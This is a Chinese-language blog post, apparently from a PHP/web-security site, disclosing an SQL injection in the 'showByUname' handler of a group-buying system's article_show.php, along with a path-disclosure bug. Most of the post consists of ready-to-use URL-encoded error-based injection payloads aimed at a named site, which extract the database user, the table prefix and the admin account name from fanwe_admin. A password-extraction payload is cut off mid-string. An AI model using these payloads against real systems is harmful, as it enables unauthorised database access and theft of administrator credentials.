以前用这个团购系统的免费的 不知道怎么现在开始收费了好像 这个 漏洞也在几个低版本中一直存在! 漏洞文件:app/source/article_show.php
<?php
if ($_REQUEST [''m''] == ''Article'' && $_REQUEST [''a''] == ''showByUname'') {
$uname = $_REQUEST[''uname'']; //无过滤
if($uname!='''')
{
$uname = rawurldecode($uname);// 不受GPC影响
..........以下代码省略 这么明显的 注射 还存在了 N个版本。。。 还有个爆路径的漏洞:mapi/comm.php exp: http://www.sitedirsec.com//index.php?m=Article&a=showByUname&uname=%2527or%201=%28select%201%20from%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28select%20user%28%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%2523 获取第一个表,主要是前缀 http://www.sitedirsec.com//index.php?m=Article&a=showByUname&uname=%27or%201%3D%28select%201%20from%20%28select%20count%28*%29%2Cconcat%28floor%28rand%280%29*2%29%2C%28select%20table_name%20from+information_schema.columns+where+table_schema%3Ddatabase%28%29%20limit%200%2C1%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%23 获取账号 http://www.sitedirsec.com/index.php?m=Article&a=showByUname&uname=%27or%201%3D%28select%201%20from%20%28select%20count%28*%29%2Cconcat%28floor%28rand%280%29*2%29%2C%28select%20adm_name%20from%20fanwe_admin%20limit%200%2C1%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%2 获取密码,这里需要截取,我也不知道为毛 1 http://www.sitedirsec.com/index.php?m=Article&a=showByUname&uname=%27or%201%3D%28select%201%20fr |
-
上一篇: yungoucms系统最新SQL注入 - 网站安全 - 自学php
下一篇: Web应用手工渗透测试——用SQLMap进行SQL盲注测试
还没有人抢沙发呢~